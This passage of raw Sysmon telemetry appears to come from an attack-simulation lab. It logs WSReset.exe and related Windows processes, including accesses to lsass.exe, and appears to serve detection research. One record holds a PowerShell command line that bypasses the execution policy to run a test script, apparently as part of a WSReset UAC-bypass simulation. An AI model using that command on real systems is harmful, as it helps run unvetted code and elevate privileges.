07:57:31.901{466BC892-02AD-60E8-0B00-00000000CF01}624800C:\Windows\system32\lsass.exe{466BC892-F5EB-60EB-837D-00000000CF01}4728C:\Windows\System32\WSReset.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\lsasrv.dll+24c07|C:\Windows\system32\lsasrv.dll+25d4d|C:\Windows\system32\lsasrv.dll+24a85|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001051127Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:31.901{466BC892-02AD-60E8-0B00-00000000CF01}624800C:\Windows\system32\lsass.exe{466BC892-F5EB-60EB-837D-00000000CF01}4728C:\Windows\System32\WSReset.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\system32\lsasrv.dll+249cd|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001051126Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:57:31.818{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-F5EB-60EB-837D-00000000CF01}4728C:\Windows\System32\WSReset.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001051125Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:31.814{466BC892-02B0-60E8-1600-00000000CF01}13044400C:\Windows\System32\svchost.exe{466BC892-F5EB-60EB-837D-00000000CF01}4728C:\Windows\System32\WSReset.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001051124Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:57:31.814{466BC892-02B0-60E8-1600-00000000CF01}13041340C:\Windows\System32\svchost.exe{466BC892-F5EB-60EB-837D-00000000CF01}4728C:\Windows\System32\WSReset.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6134|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\System32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001051123Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:31.784{466BC892-02AD-60E8-0A00-00000000CF01}6163760C:\Windows\system32\services.exe{466BC892-F5EB-60EB-857D-00000000CF01}3312C:\Windows\System32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\system32\services.exe+1713f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001051122Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:57:31.783{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-F5EB-60EB-857D-00000000CF01}3312C:\Windows\System32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001051121Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:31.772{466BC892-02AD-60E8-0500-00000000CF01}408524C:\Windows\system32\csrss.exe{466BC892-F5EB-60EB-857D-00000000CF01}3312C:\Windows\System32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x80000000000000001051120Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:57:31.772{466BC892-02AD-60E8-0A00-00000000CF01}6162696C:\Windows\system32\services.exe{466BC892-F5EB-60EB-857D-00000000CF01}3312C:\Windows\System32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6f453|C:\Windows\System32\KERNEL32.DLL+1d37f|C:\Windows\system32\services.exe+307d|C:\Windows\system32\services.exe+6334|C:\Windows\system32\services.exe+dc24|C:\Windows\system32\services.exe+d248|C:\Windows\system32\services.exe+4d0c|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001051119Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:57:31.756{466BC892-02AD-60E8-0B00-00000000CF01}624800C:\Windows\system32\lsass.exe{466BC892-02AD-60E8-0A00-00000000CF01}616C:\Windows\system32\services.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\lsasrv.dll+10d9e|C:\Windows\system32\lsasrv.dll+1d1e8|C:\Windows\system32\lsasrv.dll+1c411|C:\Windows\system32\lsasrv.dll+1ac30|C:\Windows\system32\lsasrv.dll+2706b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001051118Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:31.756{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-02AD-60E8-0B00-00000000CF01}624C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f86b|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 
10341000x80000000000000001051117Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:31.755{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-02AD-60E8-0B00-00000000CF01}624C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f71b|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001051116Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:31.755{466BC892-02AD-60E8-0B00-00000000CF01}624800C:\Windows\system32\lsass.exe{466BC892-02AD-60E8-0A00-00000000CF01}616C:\Windows\system32\services.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\lsasrv.dll+1a18d|C:\Windows\system32\lsasrv.dll+2706b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 
10341000x80000000000000001051115Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:31.690{466BC892-02B0-60E8-1600-00000000CF01}13044400C:\Windows\System32\svchost.exe{466BC892-F5EB-60EB-847D-00000000CF01}9312C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001051114Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:31.690{466BC892-02B0-60E8-1600-00000000CF01}13041340C:\Windows\System32\svchost.exe{466BC892-F5EB-60EB-847D-00000000CF01}9312C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6134|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\System32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001051113Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:31.683{466BC892-F5EB-60EB-847D-00000000CF01}93124772C:\Windows\system32\conhost.exe{466BC892-F5EB-60EB-837D-00000000CF01}4728C:\Windows\System32\WSReset.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001051112Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:57:31.674{466BC892-32CD-60E8-670B-00000000CF01}45166612C:\Windows\system32\csrss.exe{466BC892-F5EB-60EB-847D-00000000CF01}9312C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x80000000000000001051111Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:31.666{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001051110Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:57:31.666{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001051109Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:31.666{466BC892-32CD-60E8-670B-00000000CF01}45163808C:\Windows\system32\csrss.exe{466BC892-F5EB-60EB-837D-00000000CF01}4728C:\Windows\System32\WSReset.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x80000000000000001051108Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:57:31.666{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001051107Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:31.666{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001051106Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:57:31.665{466BC892-F5E6-60EB-817D-00000000CF01}84729248osoft.PowerShell.ComWindowsPowerShell\v1.0\powershell.exe{466BC892-F5EB-60EB-837D-00000000CF01}4728C:\Windows\System32\WSReset.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\windows.storage.dll+9070f|C:\Windows\System32\windows.storage.dll+90385|C:\Windows\System32\windows.storage.dll+8fe76|C:\Windows\System32\windows.storage.dll+912e8|C:\Windows\System32\windows.storage.dll+8fc9e|C:\Windows\System32\windows.storage.dll+92ab5|C:\Windows\System32\windows.storage.dll+92e34|C:\Windows\System32\windows.storage.dll+92470|C:\Windows\System32\shell32.dll+3cdcf|C:\Windows\System32\shell32.dll+3cc5c|C:\Windows\System32\shell32.dll+3c9ac|C:\Windows\System32\shell32.dll+122467|C:\Windows\System32\shell32.dll+1223c5|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\cc732d30e6f14d29889113ae06e2408d\System.ni.dll+38b30c|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\cc732d30e6f14d29889113ae06e2408d\System.ni.dll+2d41f2|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\cc732d30e6f14d29889113ae06e2408d\System.ni.dll+af11c7|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\cc732d30e6f14d29889113ae06e2408d\System.ni.dll+2c0449|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\cc732d30e6f14d29889113ae06e2408d\System.ni.dll+2c01b0|C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Pae3498d9#\ea1548159dd8b02b70895bbfe7ebabe3\Microsoft.PowerShell.Commands.Management.ni.dll+35ffe9(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Pae3498d9#\ea1548159dd8b02b70895bbfe7ebabe3\Microsoft.PowerShell.Commands.Management.ni.dll+35ffe9(wow64) 154100x80000000000000001051105Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:31.664{466BC892-F5EB-60EB-837D-00000000CF01}4728C:\Windows\System32\WSReset.exe10.0.14393.4169 
(rs1_release.210107-1130)This tool resets the Windows Store without changing account settings or deleting installed appsMicrosoft® Windows® Operating SystemMicrosoft CorporationWSReset.exe"C:\Windows\System32\WSReset.exe" C:\Temp\test\ATTACKRANGE\bob{466BC892-32CE-60E8-37BC-780000000000}0x78bc373MediumMD5=5181342124A0AB97F865A39581CE9C41,SHA256=FE7AF6AC7EA79AEA47BFF06035875DD1975590F78C31797526908C1A4877EE84,IMPHASH=279E04CF32068F56394D78D663C285A4{466BC892-F5E6-60EB-817D-00000000CF01}8472C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "-Command" "if((Get-ExecutionPolicy ) -ne 'AllSigned') { Set-ExecutionPolicy -Scope Process Bypass }; & 'C:\Temp\test\ws.ps1'" 23542300x80000000000000001051165Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:32.983{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=31CB2560A466552FACCBA041DE21D0E2,SHA256=C6DA2431FFE6D657268C42820717E7C2588E33A0434F0BB32E5936EC632FAD7F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000808561Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:57:32.619{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=1BBF615077A65F96102435B98DFEE447,SHA256=6F8ADF34D8E4B10A31E935BA70FB7D22ADDBA4980473F3C3C4CCE40B3A2BD5CF,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001051164Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:32.820{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program 
Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SystemMD5=9C9B91DD607933377C2B0241470B94CF,SHA256=B6F690379A4CBB480F9985646E92C4D1415DCC951EFD414462B13503D08DF50C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001051163Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:32.819{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SystemMD5=B5E72A778217DAF240E862475033D9B1,SHA256=C7702984BB53EE8A203D308F9D19DEC496641AC4FE2DDA79A838488141B64938,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001051162Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:32.684{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=A8BFF5AA4C89B9CDC54D2BAF29392A09,SHA256=6682B720B2E235571AD8C63B2335F162A6AF0522637799BE37EA435035145359,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001051161Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:32.453{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=9A2110BC4AAA52E683BC2D77EA274854,SHA256=94DB570939ED85B1C85E798E805A2E6DF4399B486C074FA26B998F49B988CED9,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001051160Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:32.453{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program 
